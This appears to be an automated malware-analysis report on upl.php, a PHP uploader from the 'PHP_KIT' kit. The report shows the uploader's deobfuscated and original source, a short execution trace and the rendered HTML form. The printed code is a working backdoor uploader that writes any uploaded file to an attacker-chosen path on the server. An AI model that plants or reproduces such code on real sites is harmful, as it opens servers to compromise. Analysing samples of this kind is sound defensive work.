PHP Malware Analysis

upl.php

md5: 9b8c77bd232c23e68c745843d61a7580

Deobfuscated PHP code

<?php

//
// PHP_KIT
//
// up.php = File Upload
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<html><body>
<form enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<p>Local File: <input name="userfile" type="file">
<p>Remote File: <input name="remotefile" type="text">
<input type="submit" value="Send">
</form>
<br><br><br>
<?php
if (is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
    copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
    echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
} else {
    echo "No File Uploaded";
}
?> </html></body>

Execution traces

data/traces/9b8c77bd232c23e68c745843d61a7580_trace-1676248076.512.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:28:22.409836]
1	0	1	0.000162	393512
1	3	0	0.000202	393800	{main}	1		/var/www/html/uploads/upl.php	0	0
1	3	1	0.000219	393800
			0.000244	314224
TRACE END   [2023-02-12 22:28:22.409954]


Generated HTML code

<html><head></head><body> <form enctype="multipart/form-data" action="" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000"><p>Local File: <input name="userfile" type="file"></p><p>Remote File: <input name="remotefile" type="text"><input type="submit" value="Send"></p></form><br><br><br> <!--? if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];} else { echo "No File Uploaded";} ?--> </body></html>

Original PHP code

<?//// PHP_KIT//// up.php = File Upload//// by: The Dark Raver// modified: 21/01/2004//?> <html><body> <form enctype="multipart/form-data" action="" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000"><p>Local File: <input name="userfile" type="file"><p>Remote File: <input name="remotefile" type="text"><input type="submit" value="Send"></form><br><br><br> <? if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];} else { echo "No File Uploaded";} ?> </html></body>